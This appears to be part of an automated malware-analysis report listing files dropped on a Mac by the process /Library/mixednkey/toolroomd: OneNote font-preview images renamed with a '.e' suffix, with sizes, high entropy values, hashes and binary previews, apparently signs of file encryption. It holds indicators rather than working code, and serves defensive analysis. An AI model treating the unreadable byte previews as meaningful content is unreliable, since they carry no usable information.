SHA-512:	F673BA5E40C3ADD79291A5018B4E17C62612337ED89AE778B11FC83FB18BDC799FF3F83F200CF35B34ED58D915866EA1AE0A966D22C353DDC323906A39BD61AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...s......P&.~....h..U.&..,B0.dH`.M.....'i....j..&..D.O..M....$.$\.Y.q...,.....^......Z^....m.....Ev2V..k..q.m..}$...m.U....l.. .....R#.&.1../l.2.V=0h..z.P......z.v..y..Z.j.#?..Sc.....,...?j..`.^.<:RLJ!............=w.l ....o>.N.f......%]=f.r.)B..$O.M..=.$Y.s..G...~...J..i[.Y.O.#.D...>...uj.=go.$#d.]..bo..J..d'Vq.oC@.8%..#0y[.q.d..a.P.>...P.x..;O...:.E..5.&T.x9...I+.#...U...s.jy+&x....1L[...h.E.O....u...........y\|....k..H.t@.f.L.n.D.3.#)..... .0...X)..j..)^.....p.^..."...{.....mU.>..X.pn\|^..Rapo.W.~.0..s@HC.......{..;.L.@...I..x....JW..!."...i...].....j.E.c0.....].^.P.8...g.^...]n..i.,.q.Q.~..?........./.o...x.........\....`&............Go.....9..............6........USc..#.z..?.!)EOe...y}I.<..4..0.Fu........P.3.=...d6!9'5.7.B.`i)...JP.j..}.D.;.t. ...?.2$..+.D..Kl...Y...E...(.S.uPY...~YTPh..zbN....Hi...R.f1.qJz.Ku`A...'3.....\.t-.^....Ns.Q..&..Ac.....?\|.1p...j3+s.....K.Dy..?4.&..V...Xe5..1:\G....N.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Oriya Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1890
Entropy (8bit):	7.643261267221233
Encrypted:	false
SSDEEP:	48:YuEnreIMVblQZ2n7K/mJt5lLcpJqfXW+rsPnlNfNpq:o6IC3Oeprwbfu
MD5:	239A9D7E447C7225D78B85F0646BB7A5
SHA1:	BD0A6DDE380249932F97266F8B4C5FB0C048111C
SHA-256:	EF08CC189D4B24F7813A170892B2DD604C7AAAC96BD51FE2CCC7D378E5EC9360
SHA-512:	009AC711DFA5D659B3535C2064E397C4ADAE68D54204A09430A0290C41B213994ED0AD1D2E11F878F2A74FF00FD9BC62178AF92097FE0DC963A766746EB28B9F
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.aP.6.n^.]...T.a.......]R..xH ...).^........F..`..t..JO..u.R...V.Q.m...=.d.G)]..0.pz.....~E.R4#...(.I....4.#..Yq.~...Yq.~...Yq.~.U..m...2~.~Z3.K$.,..\.....E....a...6C....7.&/.!{e.N..3..L....>...w.!.02.k...!..u..].O...\.T..n..3...U..F.._y.A.7.$.^....s.-.e..rR^.N._.....C8.S..PJ...V#.`.{J...'.......`.,.)...C^1!B....O.....).-x.-.......8..`%!.!.......R...F\`..aL.:D..@..m.6.....!...q...p.g...@..QR.7...[Wn..<....jS.L..3..9^....w....9.BW\...._...z.A..Dr...rI...S:.\|...pij..D.....(.f...F4..BL.B.s............. z....A..#d....WN.^..).?^.J._..>..`....W...joGa...\..3.0...}?Q..#.QZ.@.x8."F.%.'C....q.1...%.^..c.....t.U...w......../..F.H].2..gc.QA.zc...1.M~.....tTYv...I.U.;..{.T....O_S.;........O..F.Z..p..<9He...v...&.^X,........G...9.!../.F.qo{.."...g.k..P#..6.vh.}MG.R.$V.._.C<.t...;.D.......E...B.X.+e.g&.>..g.$\.a...^.p.;f.^uCo..Qn....R..,_./.Z..r.D.T/..W.)...x...h..z0.V.y....?x...OM.!<.y..:...i.9..v".......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PMingLiU-ExtBRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.614359017437721
Encrypted:	false
SSDEEP:	48:EiBhGHv30B+kowdCpS961JnJxG2ogLMfJMjW/pNpq:dBhGHP0sjnCORJxLupu
MD5:	476C6731B4ACD6A3E9A825F79BF08C52
SHA1:	EC05D516CBCBF67782DC3D1AAD1268EBCF406DA0
SHA-256:	567F41BA3D614FCC50C4A7F4BAB0B6F900A2CD0298839E0F103B6A27FADBDC70
SHA-512:	5BEEE7F485BC11DF4E49D6F12AB1BC9F001085215FF02CDF1A60C02423D0F2B9A53C1B872EFFB5AB37EDE57C9656A76C99A6D859B6209FBC1273F05DF5E9F7F9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.../....$.........j9]..g.=.=....b+..m.V..sR.+...Vl..E.7.;.TT.7E....._u9.O$#.../r.h...'.g.Th-:?w...%...e. -..A.^W.........9.....\|Zc&IE..:.....w?.....B .'..$..(o.k...p6!.q.....fX....\|..8.R....C..\|.<}..Ib...f.z.Ui..iP.........7.t!.v....x..."#.......c=12...`..]7...g...$4..r.a...H..E.:.4....ho.S...........@.....K7.f..[..oP..^..?k.......+...$z...sL..Oyb..1v.x.#..@.........w.8...n..em..TR9......L+O..:.T..." <...G....7jr.q......_X..V'...,(.$kuf.."F.P.Lg....k3.....x...v6.GH.oy.8.`37R.....F...."..X......c..y..9h..n.qr..C.s.....7.g...4U...(...yp.A.{..?.z.s..;.M..<.b.W\yx0..g...o...d..;..D;Q....!9.S..7P.m%.+..1........+..C..........'.$....^....i...... Y#._k.#.c.{.Y.....6.O.U..M..~D....\k...]$. ..3..9b...L...{..%V.R....Y.-8........z_0WX4...,Q/.x.FYC+....!......E..P.E:.D.r.di.K..z.#....0i@.......S....g!rC.....sc...,...).....l-.........V......O+g..~.N..*5...Z47".o..z7...+.EO.c.5....K.b .dNq.Y}...W.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PMingLiURegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1458
Entropy (8bit):	7.475645660792161
Encrypted:	false
SSDEEP:	24:EiDXQ9QrvPZXcZCmI8zi16Gg0lMlXGybhShUH8ulYsePc0m7:ESXQ9QrnZXc8X8fGcXGybhSectNpq
MD5:	EC8E0DC6407A82FA59A6FCCDE2DC19B2
SHA1:	D512CC16C21319CEA3AA049F172CC09E3EE765DE
SHA-256:	13051FFED6BDC6166C5ACC914896892506DB2EDAB7553677D996BBEEFBB3133D
SHA-512:	A4DC7E9230AC43DF24B82ADFA8134BB52D939E8B9938225EC1B4F02BEB859347A5992DBAE9C593CD64E9DD95D34DD3B20410557BE899AAFA132BB97F9216DB5B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.?.3."-.R.:.3I.e.JaY.jOV. .X...[....O....;ho.%`..AL..i..~........K...LX...z...PJ...B.t...]Z.t...`...3.Q....eX..+..{k.Zv8.-6.D@Y..!....}..}...7".d..r..q...-+.".......Y..K.HYL)Y\"6....x.<...W+.R..S.....P!.g..h...c..e..}....+-.......M.J..`..C.......]O.F.(.......9W.U.8X..#[..... ..9.hr.)...5.O(...5....?._...I.? i.._..$.X8..!.#.:w.n..X.Y+...P}........fR=....C......3u.K....j...l...w&.........@t.S....3.v.."....^j~..Q....^..T.......=.?.S..a.?...9GXg.j.yd.O..vj7.....-..TaMl...[..v.!...]R...$.cT).....Pw..#.wQ.a....."..J......@0.....!......@F)...L...)..+.m....E_n`F.h\.Z6...............P...,.t...Q...P..W.@.Sd......)...?!......Yf.7.8y,...).L....7.Q.R.\..k..#....wr.y...._...a.X.z.....(v}V.B....%.M.^`e..".C.x{o.%.. .........VWR.....miv.6...a._.....`....W\..`.j/.......Er.."..f.h.....j....-.......F../Q.H..[.ST!.B.\..~'-....~..W.V,.i.h..x.v...>..Q[.D...=.....cA....ao.&T....:..m.......Y.0.J.B.\|9..f.....uD....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT MonoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.2439762710285365
Encrypted:	false
SSDEEP:	24:Efu1Qj9JHmZdLEaX4KLYEwlRR6fzU4jXVD6tHUcrfsePc0m7:EfOQBidLjX4KLYEMo44jVD6t0crfNpq
MD5:	B031D668F10B21213600A41FF3B8A021
SHA1:	45F09D72A9B9FB0F92D88E89AB82CF207F6669CA
SHA-256:	2534BAC94DB73713415FFAC4BCC8A0AEDCF2C5999392543D70D3E23FAD4CDC43
SHA-512:	1B1FDAEB1E2CFA7093B859752379ECF8330BC0295F246ACDB8A6C2203BD5CF2FAF576D7FD353A830B341B0CDDCAD1A978560CC3DC829F09E5FBFDAF5E87EAA09
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...@..x.W]..4v.=.. ...p.f.J....T.S...G.......p...........F....\|...a=.V....7..7F/...L...I..........#.Q....]...Y.M/....~....../r......"t....oy...J...q.5...Y.:tPp._.S..+..x.....G.....Z.YR.^(.d7.....[IY;.m.....~J0..>......P'p.)+.p.....y>${..=],..[..6m.....wD.=.I~.E..K.....0.....y.QN.W.^.B.............2<.O..z..xy ..........c........1[..........l.=..w.-.dp....l..p...mCqI...+..k(..b.7.>....k.......E....1;i..?..i.N...acXWU.6...!.=..~..u..T.p.....ad.4.S..X...7e.Op...[.]...YPw..[l@.L.7D0.N.........~.L....w..'....].....=Yb...Y.qp.R6i/.;........w.Z#d..t,.......A).M....T`..]$.t4..).+...Y.(.5YZ#!.U.........!..j.wW....0...../..%G,.p....b..$.y...7..b..e.O..y..~.e6q..m.H%0A.G..~..........X.?...x.....@0.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT Sans CaptionRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1850
Entropy (8bit):	7.6169992826684725
Encrypted:	false
SSDEEP:	48:EBusvHMbdCOqh5UQvwy7Z6H+5xhfTDKd3RRV5onN7zr8TGNpq:IusvHMbddqgQvlM+ztTWdLiNX4TGu
MD5:	1BFD8023663F0E21588BDAEA7544E9BB
SHA1:	4E3D37806BD6FC75A214AB0D71C94458150EE9F9
SHA-256:	266AF25257C8B513A8E4B77206B432DBEF9E0DEB5F7C0FEDFAC3809F776C9B31
SHA-512:	42D935C1C028419EF584D89E5E7C3CB07A93559DB86F97EDC28912E267D5665E416F02D608D2D98F4C4F8E6CAF12062CE5561EE49EF292A40E5638AC65A09E81
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.p....".{.....y?.........KH.rz...\|....5..Z_tt.....k3[.\|.\.`..fc.z.?.,.i.....@.1..a.W......w........"FWb./A.W....V..W....V..W....V.e.....t.V.j..6..V..u.3...v...f...%Z'pkO.g.../U.0-..~./'dy.j..b.r..p.Ww-.U:N2.l.HE...Q..5..v .]Y..r./j...2.X.d..`{...r.Fl..6..O.G..m%\|..+.QLqU0.....i.{.1...o....n..@q.v2.g..}.......N+ 1?.".....).-...U,....a..y``.&..d.2`..=..GX..l..H^m...)./..0a<.:_..;B...x%.c).S.^.F..B.Y#..V..N...PL..4L..oT....QX..X.%._.M...\|..#.$..Y..0i...j..z.$../..-.R......z.t...ds...qE....X.N.....e......@]...u.\`.K%.s.>....[..V../$....q.m..4j@..V......aMD.6.E......!gV.}vUi. /......_..-;.........5.......<qB.)^.P._.\|u..?}...S.L..........Q...;.rDR.....)...aU.u."JV...k..4.."t.Z....`.P..H...h............mX......./.lCq.H,..lZUD...o.H(z...B../..W../.r...\|.7.^..q.c.ERn........). .:8.?..#xX@)`....w.d[53c3.agoT....'2Uw....Y).....K....vZ{N;..`.y....,T ..O.\cx.,..{sX...W.k.{..#(....V)9$I....:....(S.}...<Q.\.:

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT SansRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1130
Entropy (8bit):	7.3089737392594
Encrypted:	false
SSDEEP:	24:EcU2iYaZC1dVKYguVnqnZI7QlAJGhHoT7GHF1OFfkjm1oCn3OsePc0m7:EnaT8qnOo1CmfL1oC3ONpq
MD5:	7B3C0059CB3964B592930EF41481BABF
SHA1:	211D07169F6494D1BFA59DDF6FB3247110BD76C1
SHA-256:	CDA79427DFEF6D9EFC465B2B40E13B4B3E55C5CE519584C42488BFC3F9C79E71
SHA-512:	EE50D6446CB12B79ACFAD31425481776593292C34D00F1A73BFDE60D6644FC56589A6020515697296210DF8BF3DA92A12106011D9A7E4310B237CA07E081B4F4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.[L.y.. .1h....a...w3..5.#..;g2...~Pxv).e0.7.r.M...d7.L.m"...Js..g.)..%.....+.v..V..A......3.BP}..............Z......{o........9.".?.?z.....c.w.[..Y..i.$.........f(.,6......"..%X.C...) M..Q...I..1../X..YZL.w.MWQ7..P.G.rr9fd.........r^.#...t....$....=.!..P4.R..J./DY... Q....s......#X.1..F..."..._.3"rf(..K......D3...{.}..g....Zt.:Y.]m....E.jU.8.k.......h.u.@..}=cf.....{..p....K.Um.j5...Q!.b..../h...>..(.X.....n.;i-@..[ a.-..m...G/.......S.2.l..wC..c#z>.,_._..../.....e,p.W...pR...C.._<>...?.Vp...T...v...U...R..4..h..5...d..[.....R.......+SBfqUV. .J....jn$7w2..z.8<$..).....o.\......9> c.PP.)xV..6.G..;..7..G....j"F....aq.;........:t0..X'....2.N!Q..V.B=.\..W.n._.c.2.....v..H..e..k=Y'za.(V.cz).wl..n...N.e...R2.P...T..A?..9.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT Serif CaptionRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.64896795728486
Encrypted:	false
SSDEEP:	48:EfWjpBW1hnd2OTJsVuKMoNHxy9oVeXTNpq:T1BCn9TJsVu+HxynXTu
MD5:	09181303A2A383431E5FF03E9F0D309A
SHA1:	F813870B0D75A41CB7264C43D68A6ABF053E2B6C
SHA-256:	72B91E834774F6351D9F98419A64863846F62E62206051AB7A1078B3441BBEFD
SHA-512:	93C4208C47F1634454FCB3C17D87E296E3AA5DCE14024502B18AC8511664D53D7E4A0018B6EF97669E5C73A664661A27DB13671C5F31AF3901E4E2BD1B0BDA4A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.$........,....C6.'.......... ...U!.....z.?q..K..".......\.PD...\|8.T.C..ZS.?:'....8T...}.-...n%.v..pG...j..$1...j..$1...j..$1n+B..E3..Zw....A.J.8... ..m...q..b.1...3...w..;...=1.<.l.S.&.2..UPJL...<d...N5.._.@....s...T..(.D....\S....JR%..w..V.N.0.F.Sq.:3!...zN.....nS6....6I....Q..k.....}...............[ ...Qf3.....Q.d...'R...iI6.u..U.m......=....x.....U.m>Y7.]J...<.PU....Mr..7xp.H+./.d........./...F7.0.....3.J..#..................B.s.!O..`.is.... @0....]]..Y.>/.SB...rg.Z..c...k.z.iEDxl..;..e_....qA..:...i....~^.&...h..4hh.P...GL......M+.p..].G...H....(v.;.do......:.."...*k..l8..^.gY..jL5H@y..P...i{z({..Gz..dny+o.'5HHb.0.Cx8o...z.#..b..s..U..`.....6..9....T..s.-m:s..;..^.....@.........Z.:f..f..R.i`....}..=d....i......Lx}.......izz.%G.MQx.L.l.:.4..}B..S(B0.P...0/..x`...b.y...)Z.Lv.R+.{...].....7.. ....n.nPt..o.........,C'W. ...x.\[q.......eSz.^..^.........S......f.s.<..V&.8...!.?.y.cv..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT SerifRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.3386975329637645
Encrypted:	false
SSDEEP:	24:E+LpXud93O10yFpzO+dEI+jx7xGu6mY9IZPfegUGGsePc0m7:EoMe10QpzREI+jThZPfegvGNpq
MD5:	0308ADC42F2CCDC260F90CDB59279F32
SHA1:	8D986E8EA92883ED2016B6FE04CA6352FB70D8AB
SHA-256:	3865809AAA8D9AF68E084B8BF213C837DF817B1F624ADC46F4BFC560CFE24595
SHA-512:	AA64D499551F41534E3A0AB579786F767C776A825BCF1501FB995C0759410CA6D5059FDC30FA7F313833DF5DC87D97BEED09B9DA7B9B019BEACA17AD37640DAA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.at.\.E.H.....Q...[..f,...X......~.......2=.....-T.H9ga..b.}./....8A08...#......@..../Iy9.w..v.....D.l.P.I..fVY'za.(V.Y......1..!..%$..x.6....$JK....#.....:'nG..>G_....z...&M..>C.a.....om=c..]..E.N..Dy.(.B..8.6..\.........,F..>@A5\u..GM....Z(\.....fxe...\|$.T.&....V.t~0J.8[.SX@R.bC?B!..........l..?.Y..y..mZ=f.o\.+m.;........o. h..=ikh}.q}..w....H4].H. &.}.cZ#.b.Z.3.'..Vb....-....\..6B9.#...1..U......S....G.y..v..~...i6.PKV..../..W.\|.5.C...p..6`..I........X.....WjF.....Z.Q..........4.!...Y.v.pn.E..l....u.,.M`/./.....$?_.E..n..a....(.......6......g.0.4.d^.Vri...4.k..B..~q0j......K....\|3..?.Wd.S..(........q{...<wCh..._V.T...O..},.1.B..{pa#..K.h?.N~..P.t_.F.I..=.....K.t....[...k.#,4.%@...zTr.Q.x.(....O9.p..%;38&P.....E...%..K..e.=D0..>............U.h.Jl..IPQ......}^.{....../q..2Quw..f..sy..np.yf\|.3......%.M..Z7.E\.:....n.n...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PalatinoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	7.359881060333437
Encrypted:	false
SSDEEP:	24:GfiCPEqAajFEw+0hUK1uqvF4IrweHpPlJJ/5a6McM6JH3bmVDK5jp1sePc0m7:MPqY+X8uqvF4IMSvJ/5kMXbgDKRfNpq
MD5:	C479992EC3A0E2635C2F39D7CE99FD81
SHA1:	AF6D87FEB4529F65C189A3E1FBD8E622CCA58F74
SHA-256:	4FA1C1A5832E99A8AC3C827D2AEF25E015FD1EAD3DDA809AE020A12E9DC3404A
SHA-512:	6F3C884008A617F3BA92BBB0A29AB24CD379631E2123073010ABB23DD43B2109016C47193AF6F4A9D8D7097C477B708201290728A2A991741676FC9D5A7CC837
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a....2./..1h....a.n......B..).>..7Gwg.qN....yC..KE.?....KU.5...jm.a.:x....j>7).B.....V.g<.Z.....8...y........F..d'.rr.G...y...d...3.wG..3....Q-..G_h)P6..e...\.m...8._.J..B.0.F.;....A.........Y....2T.%..R.x...A..3...?T..d.y......J...s%.)y....S.D.....3K.&..1..-^`.bn..AY..t..@.......B..]=...-..u-..H=.).&.y.........:..Z.K......f.F....p..)ti...x8A>...d.I..N.O.....}..X...`K.v...../.).......Y]U.n..`.).8.Lh\|.f......$\|.....mh...x(...$.$.?T.....:....8.P.<.M......u2.~M....R.]..:4i..d..4.6cv..V.U......".n..$.%.NAg7..m.is.\|.-\.9l..L.8....c.^.Z............51?...J&>..dtsh.....z3!.....(.`../...U....q..S...X..]....../......)..iZb[.(......EPB.........[{.....e......f.8_z8F......P..JKh.$p.p..p.o....F\|.}....w37{i..........I.E.BA..<@a."`..2-.5..".(@....3:-..3...2.Q......lB.p-.....@3............u:....~/.:.(........3$.H......{.y.;>.\|.s.....+W..#.Q....]...Y.M/..5Z..F..*C8.Vy....\...D&.?.\|b...................\.........^./

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PapyrusRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1146
Entropy (8bit):	7.2521676307481355
Encrypted:	false
SSDEEP:	24:Yuu/M/OliwZswRXxtEKSylZABbd7/qFBNm9Ly7sePc0m7:YuNOlfRXxtEKSQOtQzce7Npq
MD5:	9F0639306238C8EDF7F804FD5515D0D2
SHA1:	FBDB946DBD2AC9A0225DDB3A808C625E711272A3
SHA-256:	F513FB00F8EF8A2AA916027673FFC751D0AED85412569F20F01C3DE7BDE1E7A2
SHA-512:	13A326D3284F53F776ACFBCE240B56A361054B9ED8475FE15C28DE0A8C3A4AF4FDA6DCD04DD0A5F1EBF9A13C181C2AF240F6D934CB0C35DAB5EE9AA1D7D4C57E
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a.3.}..}.jLc....J..(jy.....).o.".K\|.1N.... .t.K....U.3..y...e.i.`F..{7..c....8..X.tX.)f.5....QZ.gM.......~#2R-.-5"s..}m...z[$.........Y8.J5)K.2.z..1.R....9......Ah.l...U>X._....tS6@..&.,F.Sz>oJ.4._..tQ.......R...[.}...3.!.,+.v..C...........["....z..X.......xk.>..D...T...6..A.L...3.f.`...f.......y_...9...G.Rz.h...^-{.3..k.N9.}A.ah...Jx2.Y%.9r.....k..o./.l.^Jk.]ck.._..9.........W.m...\|.......7jf......v.>....n?..x..P......6.F..y..a...qw...,A;yf.P...{q.bLf.....q."..L.."T.~x.d.....m...V&..+..%._y.......T...)].G.~D..=h...fhcm.I/...`... f....OxB4..w....{....M........C.q%.?,....Z.P..]..w...'.\|.w5+....%x6...u.}..[d....1.xd/w..#.. ..c.....3.l.U..U.../b\t.g..-.W..).j...6...M._&...[.5...6..}.Y.i.j.~...%.F.!~...oH..DA5....N.....@[..nM...2.>..h.0.$j=%....6.#.&1.I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Phosphate InlineRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2106
Entropy (8bit):	7.659213040789978
Encrypted:	false
SSDEEP:	48:Ew8HSWUCTi0XQOUYsdITcXSwwxCOSnocJA7fOi5zLSv3AmNpq:gSPCTixBlIxwwxCOIocAFzL/mu
MD5:	D517CFEA9425BF90BB924969AF2CDBA0
SHA1:	E78E9047932F8638FBEE7B230046FD1EB65DD3DF
SHA-256:	094EF45210D56B7BECB6DDB451CEBE84B0BE315971F38A4D2BF38F6FCA37C1E3
SHA-512:	756B16BEE198933A6F6A30D9695CDEA82A296C74E07D83735884B270528323B9E20F0AE4AA0003B54443AC2CDED7F0997F8C684102518919438D6B4A2F523AE1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ay0.D..]3.6.!.l..G........oAr..C..8..;H.B..;.k.D.c..J....OW..5.G.5..} ...B.Fn....~{.H.kX_......I....0$.,.h..K...FY..K...FY..K...FY......U..Y.."f?D..!.....G.D)..A........?yqs.0n;..Y..x.B.=..gTd...e....(...\S..I._{..~..Q..{iV...,......D.z...N....5.Y......p.^....E"_..L.n....`x.H...X@....<qzq3..x...!9k..@.).y.-.N:..;......%Z....I.XX...,..0.'...h..,..~..c..[.j.....i..o..O^.jU.B4..-...r.'..<...n..m.wKS..?..;....([.I..z...._]..X!R.$.R+....&p..y..`[..../we..w=.9E.ys.0i.i.y..T..;....I`..2..Q..b...a...,.s.Z.Nc.....\|.ha.Bq.x\I.E.....z.:..e.fh^01. .,....O.T...5..XsL@#4,......Z8....+....:.I...@V...0f...9.b3.j..1.......=....rs..R...n..] L..O.Zx.OL...^......(...@.?:6..Y..A....W.tP{..Vr@..........R.\.Z....\.......M...{.{..".{^5'i..1X.....M9.I..#n.9WWq...sc.....F.....+)....-.7Tr...r..='.\|..-..(.q..Y..`Qo.._..H....M?B..f...])........U.A...[V.........B.......w.=.....{.K$.r.D6....%m.......7....!b%.d.6.9..\|Bs-D

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Phosphate SolidRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1778
Entropy (8bit):	7.579933684131055
Encrypted:	false
SSDEEP:	48:Eg8bmuphrkMoKK44LfSZhknK/4FHSUhUuE4Npq:98ZhrLWSZ0K/4FHSUhUuE4u
MD5:	3638AFF7AFFEA81B747A1927C20A7EC0
SHA1:	26CEB923CA30D1CE7736E02879BA747719307D63
SHA-256:	46AA558B9CC27AFB09D514E99FDEF92992778F869ADA234B0B95B06BAF8DECBB
SHA-512:	BEA3946661CFBA56B15731DE9AAA4F6EF801B88DA1D1363855FE18CDA693BBB7502642CE0E7AABA9B9043805077B246DCD90D2B89B900611F02E6490587A5F4D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...^w...:...3.......-B..k..D"D...x~..o....x=`...0W..k...Bu.~ .B......].8....KE..j....,...Oe.2yo8..'l..[l....T.........G.....>.G.....>.G.....>...5..5..M.F...m.......6k.Q.rCNn...$.e.@.%..G.....r.^..E..Z6..`....\|!.K..(..4...@<pn...D.....3..s.Q.#_...y....>....,.-P..).@....B.y.?...W.I....N..>.T..q.)...sU.........f.W.I....B..?.....5..b..I6.1oM.".[....+!..s.....3.....H.r....3..dT{,.%.C..t..\|........^..Sc.].w=F..l..=RM.,Z.`.7W..$.....1..3.....`...W....H[.......>.B^.....`..E .It,7.........}....v[m.Ra..2...O.!B-...nJ.\|..(.(.#.T.A\>.P...G...>A...N....h..o..\|.L.qnBB...Y....T.\3zUO.ue........R...>.S%.q@....Bv.[.^.a.h5h.J..+.s.N.k.p=...3....f@.m+A..ooQnM........GT...\|.[...aQ....9a.K.A...L.?..3.._)\. .p+....h.#.IV..?....=:...^...?.h...!ZvB..(..<.].9.[..w...l.l9..V0.........:iT.&.....&.-..1.M.....1.[Ks..5.b.l:...m.z....4....'.X..{.~le..........^Cr......f.F...V.`.p....w.PZ~...;...^.$.%"o.o:.\|....1....?<..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PingFang HKRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	7.403094722769081
Encrypted:	false
SSDEEP:	24:EaQb8Qx8+mEe8vFDph1tz+3G2n5LBfY7S4pRb9IgFf4qwnsePc0m7:Eaa0kvRa22nrfY/rRjx4qwnNpq
MD5:	6244AC5B60A87211FC4C13A24AB0B8CC
SHA1:	A06DA18403FCBC13A6E1DA1253F6713321A112D9
SHA-256:	5EDB77971E6CEAF565E0EA1F789E6FFE525A8B41C5612F964DF8705B2ACD6AED
SHA-512:	2766E80A01BE5450AEDB8F68A2DB3A740D881FE2C9D70776FA2160AADA14275F8AB0056701264FD0ED670D4772C035907D47C196EE7E0EB4FC1016844BC5BB2D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ag.......=b..T..{F?.c..b...S..M.w...kv..... S........(3.C..DB.S..bI.:e.?e..m.j.h..\|.)..g..I..iAO.%...b.CY.+..{k.Z......>..D..{.....Yj...6.......O.i.c....X..N....^#..ff.s......`5...1...........\i..dw..H.^...(.\|.?...e.el.....G~C...L....uF."RC.U..P.0.f\|.v...^/.N.........~.b.L.@..v....W-.s%.&HPg.@.Zq.....U..y...,....!.\|.1.{&....Mc...j.w..Le..0..^.w.r...L}.k.I..HE3.....toN$5.,..N5f.J.^.P1..._.....F.H...{....j.B.u...k.P.y.k...<..5.6...ZC.&..,~I5.=O%9.d...k.h0,.E~..e.J...kg... ..;.......$.^..2....3e...^ .G.r...\...a.L..8.".4.W....PM...]......V.b...........>.L$pe`.n#........q@.N.M..@.j.U....4.a..1,?.(D.k0.}.I~.?<.....`.V...h.$..q..?>...6.UL.:].$.a3.....?]b..T.N1d.....S...Q...dnh._V?~.h}-...Su...L~~.0r...L.[43"..[....f[...Rr.%...!.....,....4P...xJ...s.....<T..23....!.h.g..[V..9.....OZ(..k..>ArQ5d.~'...q.:.:.JT..F...$.(vn...Apa...R..........k.'^....Ch.ogs..<G.m\.X......\...h..ZM..+1.6.U%&..1..7......F.7....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PingFang SCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.464869636772248
